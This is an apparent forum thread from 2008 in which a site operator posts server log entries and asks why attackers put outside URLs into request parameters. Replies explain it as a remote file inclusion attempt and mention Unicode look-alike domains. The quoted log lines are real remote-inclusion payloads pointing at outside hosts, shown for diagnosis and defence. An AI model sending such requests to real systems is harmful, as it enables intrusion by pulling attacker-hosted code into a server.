url attack ?

[mistral9999]

I included a section of our server log below. It seems like they are inserting URLs into our URLs as parameters. For example,

/order/splist.do?m=5 (this is normal)
/order/splist.do?m= some url here


What is the purpose of this, and how can we prevent it? We do validation and error-checking on our parameters so they are ignored by the application server.

Thank you.
Matt


The following is from our logs:

192.168.111.2 - - [05/Feb/2008:01:51:20 -0500] "GET /order/splist.do?m=http%3A%2F%2F

http://www.channelnewsperu.com/imagenes/publicaciones/fotos/nepicu/egul/

HTTP/1.0" 302 431
192.168.111.2 - - [05/Feb/2008:01:51:23 -0500] "GET /order/splist.do?m=http%3A%2F%2F

http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/

HTTP/1.0" 302 431
192.168.111.2 - - [05/Feb/2008:01:51:24 -0500] "GET /cust/u/show.do?dir=http%3A%2F%2F

http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/&t=o&id=misc/obsolete

HTTP/1.0" 302 431

 

[tfg13]

This looks more like an attack than anything else. They are attempting an include, that basically tells your server, to go to that site, and download malicious content. As long as your software is up to date (this isn't always the case though, you should verify with your vendor), then file includes should not be a problem.

 

[chiph]

Expect to see more of these type attacks, as the core DNS servers get updated to use Unicode domain names.

There are many characters in Unicode that visually look like their Roman equivalents, but have entirely separate codepoints.

So people may send you normal-looking URLs which actually map back to their malware servers.

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first